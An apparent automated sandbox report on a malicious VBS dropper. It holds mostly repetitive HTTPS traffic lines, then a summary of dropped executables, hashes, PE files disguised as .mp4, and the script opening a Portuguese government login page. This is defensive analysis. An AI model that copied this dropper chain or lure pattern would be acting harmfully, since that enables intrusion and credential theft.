Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
Source: unknownNetwork traffic detected: HTTP traffic on port 50166 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50132 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50174 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
Source: unknownNetwork traffic detected: HTTP traffic on port 50186 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50244
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50244 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50184 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50152 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50175
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50174
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50176
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50178
Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50182
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50184
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50183
Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50186
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50185
Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50189
Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
Source: unknownNetwork traffic detected: HTTP traffic on port 50159 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
Source: unknownNetwork traffic detected: HTTP traffic on port 50170 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50149 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50131
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50132
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50135
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50134
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50137
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50136
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50140
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50149
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50142
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50144
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50143
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50145
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50148
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50151
Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50153
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50152
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50157
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50156
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50159
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50158
Source: unknownNetwork traffic detected: HTTP traffic on port 50182 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50160
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
Source: unknownNetwork traffic detected: HTTP traffic on port 50137 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50163
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50166
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50165
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50168
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50167
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50169
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50170
Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50173
Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown; HTTPS traffic detected: 16.12.9.14:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.4:49782 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 16.12.9.46:443 -> 192.168.2.4:49788 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 16.12.9.46:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.4:49796 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49798 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 92.53.116.138:443 -> 192.168.2.4:49830 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 92.53.116.138:443 -> 192.168.2.4:50244 version: TLS 1.2

System Summary

Source: C:\Windows\System32\wscript.exe; COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: Joe Sandbox View; Dropped File: C:\Intrumental\lspcv2.exe FC8EF9246E4D3804573FA486B0C29CE6F795CA06CFCA36B61F2248E9A4C5FF7A
Source: Joe Sandbox View; Dropped File: C:\Intrumental\place.exe 7036468E471E0432E12A7736867FC03ED3A7283877296E7ECFC7B8C2CF91F258
Source: Joe Sandbox View; Dropped File: C:\Users\Public\Termos\artigo.exe 648BDF024A96BEEEBCC3D1936755753D984D787F8354A7B45DB8FFF3700DC02D
Source: guia_luqf.vbs; Initial sample: Strings found which are bigger than 50
Source: artigo.exe.0.dr; Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: place.exe.5.dr; Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: lspcv2.exe.5.dr; Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: alphaville[1].mp4.5.dr; Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: basketchampion[1].mp4.5.dr; Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: artigo.exe.0.dr; Static PE information: Number of sections : 12 > 10
Source: alphaville[1].mp4.5.dr; Static PE information: Number of sections : 12 > 10
Source: basketchampion[1].mp4.5.dr; Static PE information: Number of sections : 12 > 10
Source: place.exe.5.dr; Static PE information: Number of sections : 12 > 10
Source: lspcv2.exe.5.dr; Static PE information: Number of sections : 12 > 10
Source: classification engine; Classification label: mal88.evad.winVBS@26/72@18/11
Source: C:\Windows\System32\wscript.exe; File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH
Source: unknown; Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\guia_luqf.vbs"
Source: C:\Users\Public\Termos\artigo.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Intrumental\place.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Intrumental\lspcv2.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\wscript.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 --field-trial-handle=1976,i,15648558303082770842,9351964472762827409,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\Public\Termos\artigo.exe "C:\users\public\Termos\artigo.exe"
Source: C:\Users\Public\Termos\artigo.exe Process created: C:\Intrumental\place.exe c:\Intrumental\place.exe
Source: C:\Users\Public\Termos\artigo.exe Process created: C:\Intrumental\lspcv2.exe c:\Intrumental\lspcv2.exe
Source: unknown Process created: C:\Intrumental\place.exe "C:\Intrumental\place.exe"
Source: unknown Process created: C:\Intrumental\lspcv2.exe "C:\Intrumental\lspcv2.exe"
Source: unknown Process created: C:\Intrumental\place.exe "C:\Intrumental\place.exe"
Source: unknown Process created: C:\Intrumental\lspcv2.exe "C:\Intrumental\lspcv2.exe"
